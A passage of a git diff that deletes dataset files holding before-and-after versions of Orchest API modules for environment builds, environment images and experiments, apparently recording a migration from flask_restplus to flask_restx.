-                models.EnvironmentBuild.project_path == build_request["project_path"],
-                or_(
-                    models.EnvironmentBuild.status == "PENDING",
-                    models.EnvironmentBuild.status == "STARTED",
-                ),
-            ).all()
-
-            for build in builds:
-                abort_environment_build(build.build_uuid, build.status == "STARTED")
-
-            # We specify the task id beforehand so that we can commit to
-            # the db before actually launching the task, since the task
-            # might make some calls to the orchest-api referring to
-            # itself (e.g. a status update), and thus expecting to find
-            # itself in the db. This way we avoid race conditions.
-            task_id = str(uuid.uuid4())
-
-            # TODO: verify if forget has the same effect as
-            # ignore_result=True because ignore_result cannot be used
-            # with abortable tasks
-            # https://stackoverflow.com/questions/9034091/how-to-check-task-status-in-celery
-            # task.forget()
-
-            environment_build = {
-                "build_uuid": task_id,
-                "project_uuid": build_request["project_uuid"],
-                "environment_uuid": build_request["environment_uuid"],
-                "project_path": build_request["project_path"],
-                "requested_time": datetime.fromisoformat(datetime.utcnow().isoformat()),
-                "status": "PENDING",
-            }
-            defined_builds.append(environment_build)
-            db.session.add(models.EnvironmentBuild(**environment_build))
-            db.session.commit()
-
-            # could probably do without this...
-            celery_job_kwargs = {
-                "project_uuid": build_request["project_uuid"],
-                "environment_uuid": build_request["environment_uuid"],
-                "project_path": build_request["project_path"],
-            }
-
-            celery.send_task(
-                "app.core.tasks.build_environment",
-                kwargs=celery_job_kwargs,
-                task_id=task_id,
-            )
-
-        return {"environment_builds": defined_builds}
-
-
-@api.route(
-    "/<string:environment_build_uuid>",
-)
-@api.param("environment_build_uuid", "UUID of the EnvironmentBuild")
-@api.response(404, "Environment build not found")
-class EnvironmentBuild(Resource):
-    @api.doc("get_environment_build")
-    @api.marshal_with(schema.environment_build, code=200)
-    def get(self, environment_build_uuid):
-        """Fetch an environment build given its uuid."""
-        env_build = models.EnvironmentBuild.query.get_or_404(
-            ident=environment_build_uuid, description="EnvironmentBuild not found"
-        )
-        return env_build.as_dict()
-
-    @api.doc("set_environment_build_status")
-    @api.expect(schema.status_update)
-    def put(self, environment_build_uuid):
-        """Set the status of an environment build."""
-        status_update = request.get_json()
-
-        filter_by = {
-            "build_uuid": environment_build_uuid,
-        }
-        update_status_db(
-            status_update,
-            model=models.EnvironmentBuild,
-            filter_by=filter_by,
-        )
-
-        return {"message": "Status was updated successfully"}, 200
-
-    @api.doc("delete_environment_build")
-    @api.response(200, "Environment build cancelled or stopped")
-    def delete(self, environment_build_uuid):
-        """Stops an environment build given its UUID.
-
-        However, it will not delete any corresponding database entries,
-        it will update the status of corresponding objects to ABORTED.
-        """
-        # this first read is to make sure the build exists
-        environment_build = models.EnvironmentBuild.query.get_or_404(
-            environment_build_uuid,
-            description="EnvironmentBuildTask not found",
-        )
-
-        status = environment_build.status
-
-        if status != "PENDING" and status != "STARTED":
-            return (
-                {
-                    "message": "Environment build has state %s, no revocation or abortion necessary or possible"
-                    % status
-                },
-                200,
-            )
-
-        abort_environment_build(environment_build_uuid, status == "STARTED")
-
-        return {"message": "Environment build was successfully ABORTED"}, 200
-
-
-@api.route(
-    "/most-recent/<string:project_uuid>",
-)
-@api.param(
-    "project_uuid",
-    "UUID of the project for which environment builds should be collected",
-)
-class ProjectMostRecentBuildsList(Resource):
-    @api.doc("get_project_most_recent_environment_builds")
-    @api.marshal_with(schema.environment_builds, code=200)
-    def get(self, project_uuid):
-        """Get the most recent environment build for each environment of a project.
-
-        Only environments for which builds have already been requested
-        are considered. Meaning that environments that are part of a
-        project but have never been built won't be part of results.
-
-        """
-
-        # filter by project uuid
-        # use a window function to get the most recently requested build for each environment
-        # return
-        rank = (
-            func.rank()
-            .over(partition_by="environment_uuid", order_by=desc("requested_time"))
-            .label("rank")
-        )
-        query = db.session.query(models.EnvironmentBuild)
-        query = query.filter_by(project_uuid=project_uuid)
-        query = query.add_column(rank)
-        # note: this works because rank is of type Label and
-        # rank == 1 will evaluate to sqlalchemy.sql.elements.BinaryExpression since the equality
-        # operator is overloaded
-        query = query.from_self().filter(rank == 1)
-        query = query.with_entities(models.EnvironmentBuild)
-        env_builds = query.all()
-
-        return {"environment_builds": [build.as_dict() for build in env_builds]}
-
-
-@api.route("/most-recent/<string:project_uuid>/<string:environment_uuid>")
-@api.param("project_uuid", "UUID of the project.")
-@api.param("environment_uuid", "UUID of the environment.")
-class ProjectEnvironmentMostRecentBuild(Resource):
-    @api.doc("get_most_recent_build_by_proj_env")
-    @api.marshal_with(schema.environment_build, code=200)
-    def get(self, project_uuid, environment_uuid):
-        """Get the most recent environment build for a project_uuid, environment_uuid pair.
-        Only environments for which builds have already been requested are considered.
-        """
-
-        recent = (
-            db.session.query(models.EnvironmentBuild)
-            .filter_by(project_uuid=project_uuid, environment_uuid=environment_uuid)
-            .order_by(desc(models.EnvironmentBuild.requested_time))
-            .first()
-        )
-        if recent:
-            return recent.as_dict()
-        abort(404, "EnvironmentBuild not found")
-
-
-def delete_project_environment_builds(project_uuid, environment_uuid):
-    """Delete environment builds for an environment.
-
-    Environment builds that are in progress are stopped.
-
-    Args:
-        project_uuid:
-        environment_uuid:
-    """
-    # order by request time so that the first build might
-    # be related to a PENDING or STARTED build, all others
-    # are surely not PENDING or STARTED
-    env_builds = (
-        models.EnvironmentBuild.query.filter_by(
-            project_uuid=project_uuid, environment_uuid=environment_uuid
-        )
-        .order_by(desc(models.EnvironmentBuild.requested_time))
-        .all()
-    )
-
-    if len(env_builds) > 0 and env_builds[0].status in ["PENDING", "STARTED"]:
-        abort_environment_build(env_builds[0].build_uuid, True)
-
-    for build in env_builds:
-        db.session.delete(build)
-    db.session.commit()
-
-
-def delete_project_builds(project_uuid):
-    """Delete all environment builds for a project.
-
-    Environment builds that are in progress are stopped.
- - Args: - project_uuid: - """ - builds = ( - models.EnvironmentBuild.query.filter_by(project_uuid=project_uuid) - .with_entities( - models.EnvironmentBuild.project_uuid, - models.EnvironmentBuild.environment_uuid, - ) - .distinct() - .all() - ) - - for build in builds: - delete_project_environment_builds(build.project_uuid, build.environment_uuid) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff deleted file mode 100644 index 52648ee..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_environment_images.py b/services/orchest-api/app/app/apis/namespace_environment_images.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_environment_images.py - +++ b/services/orchest-api/app/app/apis/namespace_environment_images.py -@@ -1,7 +1,7 @@ - import logging - - from docker import errors --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from _orchest.internals import config as _config diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py deleted file mode 100644 index 1a1f374..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py +++ /dev/null @@ -1,177 +0,0 @@ -import logging - -from docker import errors -from flask_restplus import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from _orchest.internals.utils import docker_images_list_safe, docker_images_rm_safe -from app.apis.namespace_environment_builds import ( - delete_project_builds, - delete_project_environment_builds, -) -from app.apis.namespace_experiments import stop_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.connections import docker_client -from app.utils import ( - experiments_using_environment, - interactive_runs_using_environment, - is_environment_in_use, - register_schema, - remove_if_dangling, -) - -api = Namespace("environment-images", description="Managing environment images") -api = register_schema(api) - - -@api.route( - "//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImage(Resource): - @api.doc("delete-environment-image") - def delete(self, project_uuid, environment_uuid): - """Removes an environment image given project_uuid and image_uuid - - Will stop any run or experiment making use of this environment. 
- """ - image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - - # stop all interactive runs making use of the environment - int_runs = interactive_runs_using_environment(project_uuid, environment_uuid) - for run in int_runs: - stop_pipeline_run(run.run_uuid) - - # stop all experiments making use of the environment - exps = experiments_using_environment(project_uuid, environment_uuid) - for exp in exps: - stop_experiment(exp.experiment_uuid) - - # cleanup references to the builds and dangling images - # of this environment - delete_project_environment_builds(project_uuid, environment_uuid) - delete_project_environment_dangling_images(project_uuid, environment_uuid) - - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - docker_images_rm_safe(docker_client, image_name) - - return ( - {"message": f"Environment image {image_name} was successfully deleted"}, - 200, - ) - - -@api.route( - "/in-use//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImageInUse(Resource): - @api.doc("is-environment-in-use") - def get(self, project_uuid, environment_uuid): - in_use = is_environment_in_use(project_uuid, environment_uuid) - return {"message": in_use, "in_use": in_use}, 200 - - -@api.route( - "/dangling//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class ProjectEnvironmentDanglingImages(Resource): - @api.doc("delete-project-environment-dangling-images") - def delete(self, project_uuid, environment_uuid): - """Removes dangling images related to a project and environment. - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running.""" - - delete_project_environment_dangling_images(project_uuid, environment_uuid) - return {"message": "Successfully removed dangling images"}, 200 - - -def delete_project_environment_images(project_uuid): - """Delete environment images of a project. - - All environment images related to the project are removed - from the environment, running environment builds are stopped - and removed from the db. Dangling docker images are also removed. - - Args: - project_uuid: - """ - - # cleanup references to the builds and dangling images - # of all environments of this project - delete_project_builds(project_uuid) - delete_project_dangling_images(project_uuid) - - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - images_to_remove = docker_images_list_safe(docker_client, filters=filters) - - image_remove_exceptions = [] - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - for img in images_to_remove: - docker_images_rm_safe(docker_client, img.id) - - -def delete_project_dangling_images(project_uuid): - """Removes dangling images related to a project. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. 
- - Args: - project_uuid: - """ - # look only through runs belonging to the project - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - - project_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_images: - remove_if_dangling(docker_img) - - -def delete_project_environment_dangling_images(project_uuid, environment_uuid): - """Removes dangling images related to an environment. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - environment_uuid: - """ - # look only through runs belonging to the project - # consider only docker ids related to the environment_uuid - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - f"_orchest_environment_uuid={environment_uuid}", - ] - } - - project_env_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_env_images: - remove_if_dangling(docker_img) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py deleted file mode 100644 index 92c17b0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py +++ /dev/null @@ -1,177 +0,0 @@ -import logging - -from docker import errors -from flask_restx import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from _orchest.internals.utils import docker_images_list_safe, docker_images_rm_safe -from app.apis.namespace_environment_builds import ( - delete_project_builds, - delete_project_environment_builds, -) -from app.apis.namespace_experiments import stop_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.connections import docker_client -from app.utils import ( - experiments_using_environment, - interactive_runs_using_environment, - is_environment_in_use, - register_schema, - remove_if_dangling, -) - -api = Namespace("environment-images", description="Managing environment images") -api = register_schema(api) - - -@api.route( - "//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImage(Resource): - @api.doc("delete-environment-image") - def delete(self, project_uuid, environment_uuid): - """Removes an environment image given project_uuid and image_uuid - - Will stop any run or experiment making use of this environment. 
- """ - image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=environment_uuid - ) - - # stop all interactive runs making use of the environment - int_runs = interactive_runs_using_environment(project_uuid, environment_uuid) - for run in int_runs: - stop_pipeline_run(run.run_uuid) - - # stop all experiments making use of the environment - exps = experiments_using_environment(project_uuid, environment_uuid) - for exp in exps: - stop_experiment(exp.experiment_uuid) - - # cleanup references to the builds and dangling images - # of this environment - delete_project_environment_builds(project_uuid, environment_uuid) - delete_project_environment_dangling_images(project_uuid, environment_uuid) - - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - docker_images_rm_safe(docker_client, image_name) - - return ( - {"message": f"Environment image {image_name} was successfully deleted"}, - 200, - ) - - -@api.route( - "/in-use//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class EnvironmentImageInUse(Resource): - @api.doc("is-environment-in-use") - def get(self, project_uuid, environment_uuid): - in_use = is_environment_in_use(project_uuid, environment_uuid) - return {"message": in_use, "in_use": in_use}, 200 - - -@api.route( - "/dangling//", -) -@api.param("project_uuid", "UUID of the project") -@api.param("environment_uuid", "UUID of the environment") -class ProjectEnvironmentDanglingImages(Resource): - @api.doc("delete-project-environment-dangling-images") - def delete(self, project_uuid, environment_uuid): - """Removes dangling images related to a project and environment. - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running.""" - - delete_project_environment_dangling_images(project_uuid, environment_uuid) - return {"message": "Successfully removed dangling images"}, 200 - - -def delete_project_environment_images(project_uuid): - """Delete environment images of a project. - - All environment images related to the project are removed - from the environment, running environment builds are stopped - and removed from the db. Dangling docker images are also removed. - - Args: - project_uuid: - """ - - # cleanup references to the builds and dangling images - # of all environments of this project - delete_project_builds(project_uuid) - delete_project_dangling_images(project_uuid) - - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - images_to_remove = docker_images_list_safe(docker_client, filters=filters) - - image_remove_exceptions = [] - # try with repeat because there might be a race condition - # where the aborted runs are still using the image - for img in images_to_remove: - docker_images_rm_safe(docker_client, img.id) - - -def delete_project_dangling_images(project_uuid): - """Removes dangling images related to a project. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. 
- - Args: - project_uuid: - """ - # look only through runs belonging to the project - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - ] - } - - project_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_images: - remove_if_dangling(docker_img) - - -def delete_project_environment_dangling_images(project_uuid, environment_uuid): - """Removes dangling images related to an environment. - - Dangling images are images that have been left nameless and - tag-less and which are not referenced by any run - or experiment which are pending or running. - - Args: - project_uuid: - environment_uuid: - """ - # look only through runs belonging to the project - # consider only docker ids related to the environment_uuid - filters = { - "label": [ - f"_orchest_env_build_is_intermediate=0", - f"_orchest_project_uuid={project_uuid}", - f"_orchest_environment_uuid={environment_uuid}", - ] - } - - project_env_images = docker_images_list_safe(docker_client, filters=filters) - - for docker_img in project_env_images: - remove_if_dangling(docker_img) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff deleted file mode 100644 index afe85e6..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff +++ /dev/null @@ -1,33 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_experiments.py b/services/orchest-api/app/app/apis/namespace_experiments.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_experiments.py - +++ b/services/orchest-api/app/app/apis/namespace_experiments.py -@@ -5,7 +5,7 @@ from datetime import datetime - from celery.contrib.abortable import AbortableAsyncResult - from docker import errors - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app import schema -@@ -37,14 +37,16 @@ class ExperimentList(Resource): - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" -- # TODO: possibly use marshal() on the post_data -+ # TODO: possibly use marshal() on the post_data. Note that we -+ # have moved over to using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we -- # do not have to parse it here. -- # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime -+ # do not have to parse it here. 
Again note that we are now -+ # using flask_restx -+ # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py deleted file mode 100644 index 1ccc15e..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py +++ /dev/null @@ -1,438 +0,0 @@ -import logging -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("experiments", description="Managing experiments") -api = register_schema(api) - - -@api.route("/") -class ExperimentList(Resource): - @api.doc("get_experiments") - @api.marshal_with(schema.experiments) - def get(self): - """Fetches all experiments. - - The experiments are either in queue, running or already - completed. - - """ - experiments = models.Experiment.query.all() - return {"experiments": [exp.__dict__ for exp in experiments]}, 200 - - @api.doc("start_experiment") - @api.expect(schema.experiment_spec) - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" - # TODO: possibly use marshal() on the post_data - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we - # do not have to parse it here. - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - - experiment = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_uuid": post_data["pipeline_uuid"], - "scheduled_start": scheduled_start, - "total_number_of_pipeline_runs": len(post_data["pipeline_definitions"]), - } - db.session.add(models.Experiment(**experiment)) - db.session.commit() - - pipeline_runs = [] - pipeline_run_spec = post_data["pipeline_run_spec"] - env_uuid_docker_id_mappings = None - # this way we write the entire exp to db, but avoid - # launching any run (celery task) if we detected a problem - experiment_creation_error_messages = [] - tasks_to_launch = [] - - # TODO: This can be made more efficient, since the pipeline - # is the same for all pipeline runs. The only - # difference is the parameters. So all the jobs could - # be created in batch. 
- for pipeline_definition, id_ in zip( - post_data["pipeline_definitions"], post_data["pipeline_run_ids"] - ): - pipeline_run_spec["pipeline_definition"] = pipeline_definition - pipeline = construct_pipeline(**post_data["pipeline_run_spec"]) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - non_interactive_run = { - "experiment_uuid": post_data["experiment_uuid"], - "run_uuid": task_id, - "pipeline_run_id": id_, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.NonInteractivePipelineRun(**non_interactive_run)) - # need to flush because otherwise the bulk insertion of - # pipeline steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # TODO: this code is also in `namespace_runs`. Could - # potentially be put in a function for modularity. - # Set an initial value for the status of the pipeline - # steps that will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{ - "run_uuid": task_id, - "step_uuid": step_uuid, - "status": "PENDING", - } - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - - non_interactive_run["pipeline_steps"] = pipeline_steps - pipeline_runs.append(non_interactive_run) - - # get docker ids of images to use and make it so that the - # images will not be deleted in case they become - # outdated by an environment rebuild - # compute it only once because this way we are guaranteed - # that the mappings will be the same for all runs, having - # a new environment build terminate while submitting the - # different runs won't affect the experiment - if env_uuid_docker_id_mappings is None: - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - experiment_creation_error_messages.append( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - else: - image_mappings = [ - models.PipelineRunImageMapping( - **{ - "run_uuid": task_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(image_mappings) - db.session.commit() - - if len(experiment_creation_error_messages) == 0: - # prepare the args for the task - run_config = pipeline_run_spec["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_definition": pipeline.to_dict(), - "run_config": run_config, - } - - # Due to circular imports we use the task name instead of - # importing the function directly. 
- tasks_to_launch.append( - { - "name": "app.core.tasks.start_non_interactive_pipeline_run", - "eta": scheduled_start, - "kwargs": celery_job_kwargs, - "task_id": task_id, - } - ) - - experiment["pipeline_runs"] = pipeline_runs - - if len(experiment_creation_error_messages) == 0: - # Create Celery object with the Flask context - celery = make_celery(current_app) - for task in tasks_to_launch: - res = celery.send_task(**task) - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - - return experiment, 201 - else: - logging.error("\n".join(experiment_creation_error_messages)) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - for pipeline_run in experiment["pipeline_runs"]: - pipeline_run.status = "SUCCESS" - for step in pipeline_run["pipeline_steps"]: - step.status = "FAILURE" - - models.PipelineRunStep.query.filter_by( - run_uuid=pipeline_run["run_uuid"] - ).update({"status": "FAILURE"}) - - models.NonInteractivePipelineRun.query.filter_by( - experiment_uuid=post_data["experiment_uuid"] - ).update({"status": "SUCCESS"}) - db.session.commit() - - return { - "message": "Failed to create experiment because not all referenced environments are available." - }, 500 - - -@api.route("/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class Experiment(Resource): - @api.doc("get_experiment") - @api.marshal_with(schema.experiment, code=200) - def get(self, experiment_uuid): - """Fetches an experiment given its UUID.""" - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - return experiment.__dict__ - - # TODO: We should also make it possible to stop a particular pipeline - # run of an experiment. It should state "cancel" the execution - # of a pipeline run, since we do not do termination of running - # tasks. - @api.doc("delete_experiment") - @api.response(200, "Experiment terminated") - def delete(self, experiment_uuid): - """Stops an experiment given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to "REVOKED". - """ - if stop_experiment(experiment_uuid): - return {"message": "Experiment termination was successful"}, 200 - else: - return ( - { - "message": "Experiment does not \ - exist or is already completed" - }, - 404, - ) - - -@api.route( - "//", - doc={ - "description": ( - "Set and get execution status of pipeline runs " "in an experiment." 
- ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Pipeline run not found") -class PipelineRun(Resource): - @api.doc("get_pipeline_run") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid): - """Fetch a pipeline run of an experiment given their ids.""" - non_interactive_run = models.NonInteractivePipelineRun.query.filter_by( - run_uuid=run_uuid, - ).one_or_none() - if non_interactive_run is None: - abort(404, "Given experiment has no run with given run_uuid") - return non_interactive_run.__dict__ - - @api.doc("set_pipeline_run_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid): - """Set the status of a pipeline run.""" - status_update = request.get_json() - - # The pipeline run has reached a final state, thus we can update - # the experiment "completed_pipeline_runs" attribute. - if status_update["status"] in ["SUCCESS", "FAILURE"]: - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - experiment.completed_pipeline_runs += 1 - db.session.commit() - - filter_by = { - "experiment_uuid": experiment_uuid, - "run_uuid": run_uuid, - } - update_status_db( - status_update, model=models.NonInteractivePipelineRun, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route( - "///", - doc={ - "description": ( - "Set and get execution status of individual steps of " - "pipeline runs in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Step") -@api.response(404, "Pipeline step not found") -class PipelineStepStatus(Resource): - @api.doc("get_pipeline_run_pipeline_step") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid, step_uuid): - """Fetch a pipeline step of a run of an experiment given uuids.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Combination of given experiment, run and step not found", - ) - return step.__dict__ - - @api.doc("set_pipeline_run_pipeline_step_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid, step_uuid): - """Set the status of a pipeline step of a pipeline run.""" - status_update = request.get_json() - - filter_by = { - "run_uuid": run_uuid, - "step_uuid": step_uuid, - } - update_status_db( - status_update, - model=models.PipelineRunStep, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route("/cleanup/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class ExperimentDeletion(Resource): - @api.doc("delete_experiment") - @api.response(200, "Experiment deleted") - def delete(self, experiment_uuid): - """Delete an experiment. - - The experiment is stopped if its running, related entities - are then removed from the db. - """ - if delete_experiment(experiment_uuid): - return {"message": "Experiment deletion was successful"}, 200 - else: - return {"message": "Experiment does not exist"}, 404 - - -def stop_experiment(experiment_uuid) -> bool: - """Stop an experiment. - - Args: - experiment_uuid: - - Returns: - True if the experiment exists and was stopped, false - if it did not exist or if it was already completed. 
- """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - run_uuids = [ - run.run_uuid - for run in experiment.pipeline_runs - if run.status in ["PENDING", "STARTED"] - ] - if len(run_uuids) == 0: - return False - - # Aborts and revokes all pipeline runs and waits for a - # reply for 1.0s. - celery = make_celery(current_app) - celery.control.revoke(run_uuids, timeout=1.0) - - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the task - # will try to set the status as well - for run_uuid in run_uuids: - res = AbortableAsyncResult(run_uuid, app=celery) - # it is responsibility of the task to terminate by reading \ - # it's aborted status - res.abort() - - # Update the status of the run and step entries to "REVOKED". - models.NonInteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - models.PipelineRunStep.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - db.session.commit() - return True - - -def delete_experiment(experiment_uuid) -> bool: - """Delete an experiment. - - If running, the experiment is aborted. All data related - to the experiment is removed. - - Args: - experiment_uuid: - - Returns: - True if the experiment existed and was removed, false - otherwise. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - stop_experiment(experiment_uuid) - # non interactive runs -> non interactive run image mapping - # non interactive runs step - db.session.delete(experiment) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py deleted file mode 100644 index 2511c2f..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py +++ /dev/null @@ -1,440 +0,0 @@ -import logging -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restx import Namespace, Resource - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("experiments", description="Managing experiments") -api = register_schema(api) - - -@api.route("/") -class ExperimentList(Resource): - @api.doc("get_experiments") - @api.marshal_with(schema.experiments) - def get(self): - """Fetches all experiments. - - The experiments are either in queue, running or already - completed. - - """ - experiments = models.Experiment.query.all() - return 